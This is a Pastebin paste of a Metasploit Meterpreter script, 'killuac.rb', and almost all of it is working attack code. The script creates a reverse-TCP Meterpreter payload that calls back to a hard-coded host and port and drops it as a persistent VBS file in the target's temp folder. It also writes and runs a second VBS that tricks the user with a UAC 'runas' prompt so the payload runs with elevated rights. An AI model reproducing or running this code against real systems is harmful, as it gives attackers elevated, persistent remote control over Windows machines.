Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # $Id: killuac.rb spudgunman $
- #
- # Meterpreter script to prompt for permissions to run in elevated mode and then call home
- # some code pulled from the persistence.rb script
- # Script by Kelly Keeton<kellykeeton [at] hotmail>
- # Version: 0.5
- #
- # Default parameters
- #
- rhost = "192.168.254.129"
- rport = 31337
- payload = "windows/meterpreter/reverse_tcp"
- ##
- tempdir = client.fs.file.expand_path("%TEMP%")
- payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
- platform = client.platform.scan(/(win32|win64)/)
- unsupported if not platform
- print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
- pay = client.framework.payloads.create("#{payload}")
- pay.datastore['LHOST'] = rhost
- pay.datastore['LPORT'] = rport
- raw = pay.generate
- payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
- print_status("Payload script is #{payloadvbs.length} bytes long")
- uacvbs = "
- If WScript.Arguments.length =0 Then
- Set objShell = CreateObject(\"Shell.Application\")
- objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
- Else
- Set objShell = WScript.CreateObject(\"WScript.Shell\")
- Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
- strPath = Wscript.ScriptFullName
- Set objFile = objFSO.GetFile(strPath)
- strFolder = objFSO.GetParentFolderName(objFile)
- tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
- objShell.Run(tmp)
- End If"
- #
- # Upload to the filesystem
- #
- elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
- print_status("UAC elevation script written to #{elevationfile}")
- fd = client.fs.file.new(elevationfile, "wb")
- fd.write(uacvbs)
- fd.close
- print_status("payload script written to #{payloadfile}")
- fd = client.fs.file.new(payloadfile, "wb")
- fd.write(payloadvbs)
- fd.close
- #
- # Execute the script
- #
- proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
- print_status("Script executed with PID #{proc.pid}")
- #EOF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement